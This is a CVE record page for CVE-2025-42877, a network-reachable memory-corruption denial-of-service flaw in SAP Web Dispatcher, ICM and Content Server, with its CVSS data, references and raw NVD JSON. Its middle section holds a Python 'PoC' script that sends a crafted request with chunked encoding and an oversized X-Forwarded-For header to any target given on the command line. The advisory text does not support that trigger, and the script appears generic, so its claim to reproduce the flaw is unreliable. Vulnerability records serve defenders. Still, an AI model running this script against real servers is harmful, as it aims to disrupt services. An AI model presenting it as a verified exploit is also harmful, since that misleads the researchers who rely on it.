CVE-2025-42877

Description

SAP Web Dispatcher, Internet Communication Manager (ICM), and SAP Content Server allow an unauthenticated user to exploit logical errors that lead to a memory corruption vulnerability. This results in high impact on the availability with no impact on confidentiality or integrity of the application.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

SAP Web Dispatcher (具体版本需参考SAP官方公告)

SAP Internet Communication Manager (ICM) (具体版本需参考SAP官方公告)

SAP Content Server (具体版本需参考SAP官方公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import sys

def send_malicious_request(target_ip, target_port, path='/'):
    """Send a crafted HTTP request to trigger memory corruption"""
    # Crafted request with malformed headers
    payload = f"GET {path} HTTP/1.1\r\n"
    payload += "Host: " + target_ip + "\r\n"
    payload += "Transfer-Encoding: chunked\r\n"
    payload += "X-Forwarded-For: " + "A" * 1000 + "\r\n"
    payload += "\r\n"
    payload += "0\r\n\r\n"
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        sock.send(payload.encode())
        print(f"[+] Malicious request sent to {target_ip}:{target_port}")
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_ip> <port>")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2])
    send_malicious_request(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-42877
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-42877
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-42877/
[4] VulDB https://vuldb.com/cve/CVE-2025-42877
[5] https://me.sap.com/notes/3677544
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-42877", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:52.043", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Web Dispatcher, Internet Communication Manager (ICM), and SAP Content Server allow an unauthenticated user to exploit logical errors that lead to a memory corruption vulnerability. This results in high impact on the availability with no impact on confidentiality or integrity of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://me.sap.com/notes/3677544", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}